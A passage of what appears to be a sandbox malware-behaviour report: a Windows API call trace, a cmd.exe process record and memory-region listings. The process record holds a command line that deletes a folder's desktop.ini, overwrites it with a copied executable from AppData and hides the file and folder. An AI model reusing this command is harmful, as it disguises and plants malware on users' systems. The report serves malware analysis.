returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.165] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.165] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] GetFileType (hFile=0x4c) returned 0x1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.165] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] GetFileType (hFile=0x4c) returned 0x1 [0232.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.166] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.167] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.167] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] GetFileType (hFile=0x4c) returned 0x1 [0232.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.167] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.168] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.168] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.168] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.170] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.170] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x32, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x32, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.172] _close (_FileHandle=4) returned 0 [0232.172] FindNextFileW (in: hFindFile=0x2d0f00, lpFindFileData=0x16f09c | out: lpFindFileData=0x16f09c) returned 0 [0232.173] GetLastError () returned 0x12 [0232.173] FindClose (in: hFindFile=0x2d0f00 | out: hFindFile=0x2d0f00) returned 1 [0232.173] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.175] _close (_FileHandle=3) returned 0 [0232.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.191] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.193] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.193] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.193] SetConsoleInputExeNameW () returned 0x1 [0232.193] GetConsoleOutputCP () returned 0x1b5 [0232.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.193] exit (_Code=0) Process: id = "621" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34485 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34486 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34487 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34488 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34489 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34490 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34491 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34492 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34493 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34494 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34807 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34808 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34809 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34810 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 34811 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 34812 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34813 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34814 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34815 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34816 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34817 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34818 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34819 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34820 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34821 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 34822 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34823 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34824 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34825 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34826 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34827 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 34828 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34829 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 34830 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 34855 start_va = 0x13d0000 end_va = 0x169efff entry_point = 0x13d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 